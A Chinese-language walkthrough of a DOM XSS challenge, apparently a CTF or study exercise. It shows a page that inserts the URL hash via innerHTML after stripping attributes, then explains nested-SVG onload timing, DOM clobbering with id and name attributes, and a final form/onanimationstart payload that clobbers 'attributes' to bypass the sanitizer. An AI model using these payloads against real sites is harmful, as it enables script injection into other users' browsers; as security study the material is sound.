源码

<script>const data = decodeURIComponent(location.hash.substr(1));;const root = document.createElement('div');root.innerHTML = data;// 这里模拟了XSS过滤的过程，方法是移除所有属性，sanitizerfor (let el of root.querySelectorAll('*')) {let attrs = [];for (let attr of el.attributes) {attrs.push(attr.name);}for (let name of attrs) {el.removeAttribute(name);}}    document.body.appendChild(root); </script>

可以明显的看到这是个DOM XSS，用户的输入会构成一个新div元素的子结点，但在插入body之前会被移除所有的属性。

当尝试输入弹窗警告代码时，没有反应-在执行前属性被删除了。

SVG标签

HTML树型结构

在文档中的script标签会阻塞DOM的构造。

先注释掉过滤代码，此时正常弹窗

payload:<svg><svg src=1 onload=alert(1)></svg>

最内层的svg先触发，然后再到下一层，而且是在DOM树构建完成以前就触发了相关事件。

Dom-Clobbring

采用DOM劫持

    <img id="x"><img name="y"><script>console.log(x);console.log(y);console.log(document.x);console.log(document.y);console.log(window.x);console.log(window.y);</script>

我们可以通过这种方式去创建或者覆盖 document 或者 window 对象的某些值，但是看起来我们举的例子只是利用标签创建或者覆盖最终得到的也是标签，是一个HTMLElment对象。

但是对于大多数情况来说，我们可能更需要将其转换为一个可控的字符串类型，以便我们进行操作。

tostring

Object.getOwnPropertyNames(window) 
.filter(p => p.match(/Element$/)) 
.map(p => window[p])  
.filter(p => p && p.prototype && p.prototype.toString !== Object.prototype.toString)

我们可以得到两种标签对象：

HTMLAreaElement ()& HTMLAnchorElement (<a>)，利用href属性来进行字符串转换。

<body><a id="test" href="http://xianoupeng.com">aaa</a>
</body>
<script>alert(test)
</script>

引入name属性：

    <div id=x><a id=y href='www.xianoupeng.com'></a></div><script>alert(x.y);</script>

使用payload:<style>@keyframes x{}</style><form style="animation-name: x" onanimationstart="alert(1)"><input id=attributes><input id=attributes>解决最初的问题